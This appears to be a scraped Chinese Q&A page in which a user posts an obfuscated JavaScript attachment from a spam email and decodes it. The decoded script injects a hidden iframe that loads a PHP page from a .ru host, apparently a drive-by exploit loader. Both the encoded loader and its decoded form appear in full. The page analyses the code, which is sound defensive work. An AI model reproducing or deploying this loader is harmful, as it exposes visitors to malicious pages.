垃圾邮件中的 JavaScript；它想做什么？

2023-12-10

我收到一封带有 .htm 附件的垃圾邮件。我在 Linux 机器上的 gedit 中打开该文件并看到以下内容。它尝试运行的脚本会执行任何操作吗？它看起来无害，但却令人困惑。

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
 <head>
  <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  <title>Please wait untill the page loads...</title>
 </head>
 <body>  
<h1>Loading... Please Wait...</h1><br>
 </body>`

<script>
if(window['doc'+'ume'+'nt'])
    aa=/\w/.exec(new Date()).index+[];
    aaa='0';
    try {
        new location();
    }catch(qqq){
        ss=String;
        if(aa===aaa)
            f='-30q-30q66q63q-7q1q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q2q84q-30q-30q-30q66q63q75q58q70q62q75q1q2q20q-30q-30q86q-7q62q69q76q62q-7q84q-30q-30q-30q61q72q60q78q70q62q71q77q7q80q75q66q77q62q1q-5q21q66q63q75q58q70q62q-7q76q75q60q22q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q-7q80q66q61q77q65q22q0q10q9q0q-7q65q62q66q64q65q77q22q0q10q9q0q-7q76q77q82q69q62q22q0q79q66q76q66q59q66q69q66q77q82q19q65q66q61q61q62q71q20q73q72q76q66q77q66q72q71q19q58q59q76q72q69q78q77q62q20q69q62q63q77q19q9q20q77q72q73q19q9q20q0q23q21q8q66q63q75q58q70q62q23q-5q2q20q-30q-30q86q-30q-30q63q78q71q60q77q66q72q71q-7q66q63q75q58q70q62q75q1q2q84q-30q-30q-30q79q58q75q-7q63q-7q22q-7q61q72q60q78q70q62q71q77q7q60q75q62q58q77q62q30q69q62q70q62q71q77q1q0q66q63q75q58q70q62q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q76q75q60q0q5q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q2q20q63q7q76q77q82q69q62q7q79q66q76q66q59q66q69q66q77q82q22q0q65q66q61q61q62q71q0q20q63q7q76q77q82q69q62q7q73q72q76q66q77q66q72q71q22q0q58q59q76q72q69q78q77q62q0q20q63q7q76q77q82q69q62q7q69q62q63q77q22q0q9q0q20q63q7q76q77q82q69q62q7q77q72q73q22q0q9q0q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q80q66q61q77q65q0q5q0q10q9q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q65q62q66q64q65q77q0q5q0q10q9q0q2q20q-30q-30q-30q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q7q58q73q73q62q71q61q28q65q66q69q61q1q63q2q20q-30q-30q86'
        .split('q');
        md='a';
        e=window['e'+'val'];
        w=f;
        s='';
        fr='fromChar';
        r=ss[fr+'Code'];
        for(i=0;-i>-w.length;i+=1) {
            j=i;
            s=s+r(39+1*w[j]);
        }
        if(Math.round(-4*Math.tan(Math.atan(0.5)))===-2)
            z=s;
        e(z);
    }
</script>

</html>

编码为f是下面的代码，该脚本evals（执行）：

if (document.getElementsByTagName('body')[0]){
iframer();
} else {
document.write("<iframe src='http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php' width='10' height='10' style='visibility:hidden;position:absolute;left:0;top:0;'></iframe>");
}
function iframer(){
var f = document.createElement('iframe');
f.setAttribute('src','http://cparabnormapoopdsf.ru:8080/images/aublbzdni.php');
f.style.visibility='hidden';
f.style.position='absolute';
f.style.left='0';
f.style.top='0';
f.setAttribute('width','10');
f.setAttribute('height','10');
document.getElementsByTagName('body')[0].appendChild(f);
}

我假设任何存在的东西http://cparabnormapoopdsf.ru:8080是邪恶的，并试图利用某种浏览器漏洞。

我能够提取f基本上复制脚本正在执行的操作：

var f = '-30q-30q66q63q-7q1q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q2q84q-30q-30q-30q66q63q75q58q70q62q75q1q2q20q-30q-30q86q-7q62q69q76q62q-7q84q-30q-30q-30q61q72q60q78q70q62q71q77q7q80q75q66q77q62q1q-5q21q66q63q75q58q70q62q-7q76q75q60q22q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q-7q80q66q61q77q65q22q0q10q9q0q-7q65q62q66q64q65q77q22q0q10q9q0q-7q76q77q82q69q62q22q0q79q66q76q66q59q66q69q66q77q82q19q65q66q61q61q62q71q20q73q72q76q66q77q66q72q71q19q58q59q76q72q69q78q77q62q20q69q62q63q77q19q9q20q77q72q73q19q9q20q0q23q21q8q66q63q75q58q70q62q23q-5q2q20q-30q-30q86q-30q-30q63q78q71q60q77q66q72q71q-7q66q63q75q58q70q62q75q1q2q84q-30q-30q-30q79q58q75q-7q63q-7q22q-7q61q72q60q78q70q62q71q77q7q60q75q62q58q77q62q30q69q62q70q62q71q77q1q0q66q63q75q58q70q62q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q76q75q60q0q5q0q65q77q77q73q19q8q8q60q73q58q75q58q59q71q72q75q70q58q73q72q72q73q61q76q63q7q75q78q19q17q9q17q9q8q66q70q58q64q62q76q8q58q78q59q69q59q83q61q71q66q7q73q65q73q0q2q20q63q7q76q77q82q69q62q7q79q66q76q66q59q66q69q66q77q82q22q0q65q66q61q61q62q71q0q20q63q7q76q77q82q69q62q7q73q72q76q66q77q66q72q71q22q0q58q59q76q72q69q78q77q62q0q20q63q7q76q77q82q69q62q7q69q62q63q77q22q0q9q0q20q63q7q76q77q82q69q62q7q77q72q73q22q0q9q0q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q80q66q61q77q65q0q5q0q10q9q0q2q20q63q7q76q62q77q26q77q77q75q66q59q78q77q62q1q0q65q62q66q64q65q77q0q5q0q10q9q0q2q20q-30q-30q-30q61q72q60q78q70q62q71q77q7q64q62q77q30q69q62q70q62q71q77q76q27q82q45q58q64q39q58q70q62q1q0q59q72q61q82q0q2q52q9q54q7q58q73q73q62q71q61q28q65q66q69q61q1q63q2q20q-30q-30q86'
    .split('q');

这会得到一个数字数组，脚本通过向每个数字添加 39 将其组装成一个字符串：

for (var i=0, s=''; i < f.length; i++) s+=String.fromCharCode(39+1*f[i]);

本文内容由网友自发贡献，版权归原作者所有，本站不承担相应法律责任。如您发现有涉嫌抄袭侵权的内容，请联系:hwhale#tublm.com(使用前将#替换为@)

javascript

html

spam

垃圾邮件中的 JavaScript；它想做什么？的相关文章

将数据从 javascript 发送到 mysql 数据库

我有这个小点击计数器我想将每次点击都包含在 mysql 表中有人可以帮忙吗 var count1 0 function countClicks1 count1 count1 1 document getElementById p1 in
Jquery toggle() 函数无法与hoverwords() 滑动字母扩展一起使用

我有 2 个 div 每 3 秒切换一次现在对于 div 中的文本我使用一个名为滑动字母的扩展正如您在此处提供的演示中看到的那样 http tympanus net Development SlidingLetters http
如何在使用“document.createElement()”方法创建单元格后立即在 JavaScript 中设置单元格宽度？

我已经使用 document createElement td 方法在 html 页面中为动态表格创建了单元格现在希望用一些不同的值设置每个单元格的宽度尝试过 cell width width 但它不起作用我怎样才能实现它 Use s
NodeJS 中的 uglify-js“找不到模块”

在这里我正在创建应用程序来压缩 javascript 文件我所做的步骤在我的本地机器上安装了nodeJS 检查节点和 npm 正在工作通过 npm install uglify js g 安装 uglify js 并安装当我尝试在命
从 Google 电子表格中的列填充 HTML 下拉菜单

我是 gs 的新手所以这应该不难我有一个 Google 电子表格其中一列中有值假设 A 列我使用 gs 创建了一个自定义菜单用户将在其中选择一个选项单击其中一个选项新组件将出现一个弹出窗口其中包含一个下拉菜单用户应从其
Knockout JS - 如何正确绑定 observableArray

请看一下这个例子 http jsfiddle net LdeWK 2 http jsfiddle net LdeWK 2 我想知道如何绑定可观察数组的值我知道上面例子中的问题就是这一行 p Editing Fruit p
IE 11 的 Map(iterable) 替代方案

不幸的是我必须支持IE11 我使用以下代码创建地图已使用 entries 的 polyfill const map new Map Object entries array 但由于IE11不支持iterable构造函数中Map 是空的我
无法解构“undefined”或“null”的属性“user”

使用 redux 检索用户信息时出错我想从数据库获取用户信息姓名密码和头像地址然后对其进行编辑我正在使用nodejs express react redux 和jwt Actions user js import axios fr
在 Javascript 中缓存和预取过期的 Promise

Promise 是我在 Javascript 中管理异步代码的首选方式 Memoize npm 上的 memoizee 是一个 Javascript 库用于轻松缓存和预取函数结果理想情况下我想结合两者的优点并且能够使 Promise
防止Rails Turbolinks导致Google地图JS多次执行

我目前正在开发 Rails 应用程序但出现以下错误您已在此页面上多次包含 Google Maps API 这可能会导致意外错误经过一番研究后我发现 Turbolinks 导致了这个问题当的时候link to单击后 Google
JavaScript 按属性删除对象数组中的元素

我有一个以下形式的对象数组 prop1 value1 banks id value property2 value2 所以我想要做的是通过搜索 id 值来删除 banks 属性中的元素然后从banks数组中删除找到的元素 id 属性具有唯
两列宽度可变且它们之间的间隙固定

我需要动态设置两列的样式它们各自的宽度应为 50 但它们之间的固定间隙为 10px 当我折叠菜单时列应加宽至可用空间并且间隙应保持 10 像素因此列不能采用固定宽度我试过这个 container background red w
如何从此 d3.js layout.tree 获取树祖先和树后代的列表？

我正在尝试和修改this https bl ocks org mbostock 4339083d3 js 的示例用于根据 JSON 树结构绘制树这就是树的一部分开始时的样子我正在尝试进行两个单独的修改但我不知道该怎么做当单击节点的
在React Native中在Android真实设备上运行应用程序时console.log输出在哪里

我目前正在做一个项目在那个项目中我正在打印控制台日志但没有消息在任何地方打印我在用npm 和 React native cli在真正的 Android 设备上运行 Thanks 如果您使用模拟器可以按 Cmd M Android 或
无需递归即可展平多个嵌套数组的数组 - javascript

也许这是一个愚蠢的问题但我无法意识到是否可以在不使用递归的情况下展平多维数组我用递归编写了一种解决方案 function transform arr var result arr forEach flatten function fla
淡出图像上的文字

我知道如何使用 CSS 透明渐变淡出纯色背景上的文本但是如何才能淡出图像背景上的文本呢这是我想要的一个例子注意我需要像图像一样的静态效果而不是动态过渡 CSS mask image可能是您正在寻找的 div background
jQuery 将所有 href="" 替换为 onclick="window.location="

所以我有一个很酷的给你我需要在渲染时扫描我的 html 文档并替换每个 href with onclick window location 不仅如此我还需要将链接从 href 带到 window location 例如如果我有 hre
允许调用函数覆盖默认选项 - jQuery UI 对话框

我希望 CallingFunction 能够覆盖中提供的默认选项showDivPopUp功能 function calling showDivPopUp title of pop up box message to show buttons
如何检索 JQuery 数据表的排序状态

我对 JQuery Datatables 还很陌生我正在尝试检索有关数据表的两个信息当前正在对哪个列索引进行排序也称为选择排序顺序升序或降序不知道我应该如何解决这个问题使用 jquery 查找列索引或者 Datatables
使用 JavaScript 更改网址栏中的域名

有没有办法使用window history pushState或者任何其他js函数来更改地址栏中的整个url 我无法删除根部分上下文我的应用程序位于 Heroku 上网址如下所示http mywebsite herokuapp com

随机推荐

按下 Tab 时自动滚动到 SliverList 项目之一

我有一个有状态的小部件顶部有选项卡下面有一个列表该列表分为不同的类别每个类别都列在每个选项卡中我想要做的是当在选项卡中按下某个项目时我希望列表中相应的类别滚动查看下面是相关代码供参考 SliverPersistentHead
从数据框中删除行名称的显示

我正在使用以下代码创建一个数据框 df lt data frame dbGetQuery con paste select from test 结果是这样的 UID BuildingCode AccessTime 1 123456 BUIL
如何将 .NET Core 2.2 Web API 迁移到 .NET Core 3.0？

我正在关注微软的迁移指南但失败了因此我使用 NET 2 2 创建了一个新项目来建立一个干净的模板然后尝试迁移到 NET Core 3 0 但它再次失败了在里面Startup cs 依赖注入找不到方法services AddMvc
导航栏左侧按钮的问题

我在导航栏的左侧有一个按钮我在该按钮附近还有一个 UIButton 现在当我单击导航栏下方的按钮时在许多情况下会单击导航栏上的按钮知道为什么会发生这种情况吗有什么建议 Thanks 图像如果单击红色按钮内的任意位置导航栏左上
Java中如何将int[]转换为List？

我如何转换int into List
状态变量在页面上显示之前不会存储 JSON 响应

Context 我正在使用使用 Async Await 的 Axios 从 GET 请求中检索 JSON 响应它存储在一个名为的状态变量中tutorDetails内useMemo钩我正在访问 React JSX 中存储的状态变量retu
通过忽略某些字符来比较两个字符串

我想知道是否有一种简单的方法可以通过排除字符串中的某些字符来检查两个字符串是否匹配请参见下面的示例我可以轻松地编写这样的方法通过编写正则表达式来查找通配符字符并用常见字符替换它们然后比较两个字符串str1和str2 我并不是在
Parrot VM 对最终用户有什么好处？

这样做有什么好处鹦鹉虚拟机对于最终用户软件开发人员例如如果我可以直接针对 Perl 或 Python 进行编程为什么我还要在 Parrot 下为它们进行编程呢基本上 VM 的典型优点可移植性运行时优化等从主页一旦程序被编译
创建后台线程用于核心数据写入

我正在尝试重新创建这篇 cocoanetics 文章中描述的三层核心数据系统 http www cocoanetics com 2012 07 multi context coredata 我遇到的问题是在其自己的后台线程上创建私有 MOC
php 无法解析符号链接

php 似乎没有解析符号链接我试图将符号链接的目标添加到 php 文件中的包含路径但 php 似乎无法识别符号链接指向目录因此无法找到我想要包含的文件对于上下文这里是相关目录详细信息 gt pwd var www siteroot
如何在 Scala 中使用 Java 包 com.example...object

如何引用名称中包含对象例如 Scala 中的 com example object 的 Java 包 Scala 将对象视为保留字并抱怨将保留字放在反引号内如下所示 com example object
、的香草自定义元素中继器

我目前正在尝试实现一个中继器WebComponent让公司可以轻松创建前端而不依赖于任何framework 由架构决定这是我当前的代码 ul ul
Paging .net MVC - 无需从WebService下载所有记录

我有以下问题我想要进行良好的分页但我不想将所有记录从 WebService 下载到我的应用程序控制器代码 public ActionResult Vacations int page int pageNumber page 1 int
如何取消隐藏被覆盖的函数？

假设我有自己的函数名为zeros在Matlab路径上现在我想调用内置的zeros 我怎样才能做到这一点 Use the builtin功能 builtin function arg1 argN 在你的情况下例如 builtin zer
传单在地图上固定大小的圆圈

我正在使用 leaflet js 创建一些标记和圆圈我正在使用下面给出的代码来绘制圆圈 L circle lat lng 1000 color colorCode stroke false fillColor colorCode fill
无法解析 Firebase 库 android

我正在开发适用于 Android 的 firebase 同步项目时出现错误错误 27 13 无法解析 com google firebase firebase auth 10 2 0错误无法解析 com google firebase
SQLiteOpenHelper.getWritableDatabase() 的 nullPointerException，Android

我正在尝试让 SQLite 数据库在 Android 上工作在 MainActivity 中编写了一个小测试其中包括在数据库一行的 3 列中输入值之后数据被读回并显示到屏幕上以验证其是否有效但是我在 SQLiteOpenHelpe
如何在名为 key for hibernate 的列名称中添加反引号

我有一个 MySQL DB 表我无法修改该表但必须向其中插入值它有一个名为key我需要插入其中现在我的 hbm xml 文件有
在Android Studio中添加JsonPath导致非零退出值2错误

当我添加JsonPath库到我的 Android Studio 1 4 项目时出现以下错误 Error Execution failed for task app dexDebug gt com android ide common pro
垃圾邮件中的 JavaScript；它想做什么？

我收到一封带有 htm 附件的垃圾邮件我在 Linux 机器上的 gedit 中打开该文件并看到以下内容它尝试运行的脚本会执行任何操作吗它看起来无害但却令人困惑 h1 Loadin h1

垃圾邮件中的 JavaScript；它想做什么？

垃圾邮件中的 JavaScript；它想做什么？ 的相关文章

随机推荐

热门标签

垃圾邮件中的 JavaScript；它想做什么？的相关文章